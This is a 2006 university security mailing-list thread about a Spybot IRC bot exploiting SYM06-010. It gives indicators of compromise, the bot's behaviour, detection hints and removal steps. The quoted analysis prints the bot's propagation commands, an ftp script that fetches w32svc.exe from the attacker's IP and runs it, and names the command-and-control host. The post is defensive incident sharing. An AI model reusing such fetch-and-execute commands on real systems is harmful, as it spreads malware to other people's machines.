[unisog] More: Bot outbreak exploiting SYM06-010

H. Morrow Long morrow.long at yale.edu
Tue Nov 28 14:02:40 GMT 2006


Symantec sent out a bulletin to their Platinum
customers last night detailing that there was a
new version of the W32.Spybot worm exploiting
SYM06-010 and pointing them to the malware
description web page :

  http://www.symantec.com/avcenter/security/Content/2006.05.25.html

It says that signature files #61675 and later
will be available today (11/28) with the sig
of the new variant.

- H. Morrow Long, CISSP, CISM, CEH
   University Information Security Officer
   Director -- Information Security Office
   Yale University, ITS



On Nov 28, 2006, at 12:09 AM, Liu, David wrote:

> Any idea on if the malware info has been m,ade public on the Symantrec
> site?
>
> -----Original Message-----
> From: unisog-bounces at lists.dshield.org
> [mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
> Sent: Monday, November 27, 2006 7:02 PM
> To: UNIversity Security Operations Group
> Subject: [unisog] More: Bot outbreak exploiting SYM06-010
>
> We had a number of hosts become infected with an IRC bot today that  
> used
> www.flackware.info as the Command and Control. Here is information  
> that
> I know so far:
>
> ===================
> Command and Control
> ===================
> . www.flackware.info:6667/tcp (the only apparent name/port used)
> . (auto)JOIN #text airforce
>
> =========
> File Info
> =========
> . MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
> . w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
> . Symantec definitions 11/27/2006 rev.50 and later will detect it as a
> Spybot variant
>
> =============
> How to Obtain
> =============
> The bot uses a build-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
> spread. When it compromises a machine, it executes the following
> commands:
>
> echo open (ip address of attacker) (ftp server port) > i
> echo user 1 1 >> i
> echo get w32svc.exe >> i
> echo quit >> i
> ftp -As:i
> w32svc.exe
> exit
>
> ========
> When Run
> ========
> . Installs itself to %WINDIR%\w32svc.exe
> . Sets Windows File Protection to "Scan only at bootup"
> . Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
> and backup.tftp
> . Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
> . Attempts to connect to the Command and Control server
> . Installs itself as a service in many places within the registry
>
> =================
> Infection Vectors
> =================
> . Almost certainly via SYM06-010
> . Almost certainly other Windows vulnerabilities (since patched)
>
> ==============================
> Detecting Infections - Network
> ==============================
> . Looking for DNS queries for www.flackware.info
> . Looking for network traffic to port 6667/tcp going to the IP address
> for www.flackware.info
> . Looking for scanning (more than 3-4 destinations) on port 2967/tcp
>
> =======================================
> Identifying Infection - At the Computer
> =======================================
> . Look for %WINDIR%\w32svc.exe
> . Look for a Service called "Windows Network Firewall"
>
> =======
> Removal
> =======
> Symantec definitions 11/27/2006 rev.50 performed admirably on my test
> box. Assuming the host did not have any other malware loaded onto it
> after infection, updating the AV defs to that "rev" or later, scanning
> the hard drive, then rebooting when prompted should do the trick.
>
> Manual Removal: Set the "Windows Network Firewall" service to
> "Disabled", and reboot (you can't stop the service while it is  
> running).
> Delete the w32svc.exe file, and preferably, remove the associated
> (dozens of) registry keys.
>
> Brian
>
> -- 
> Brian Eckman, Security Analyst
> University of Minnesota
> Office of Information Technology
> Security & Assurance
>
>
> _______________________________________________
> unisog mailing list
> unisog at lists.dshield.org
> https://lists.sans.org/mailman/listinfo/unisog
>
> _______________________________________________
> unisog mailing list
> unisog at lists.dshield.org
> https://lists.sans.org/mailman/listinfo/unisog

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.sans.org/pipermail/unisog/attachments/20061128/96468e1a/attachment-0001.htm 


More information about the unisog mailing list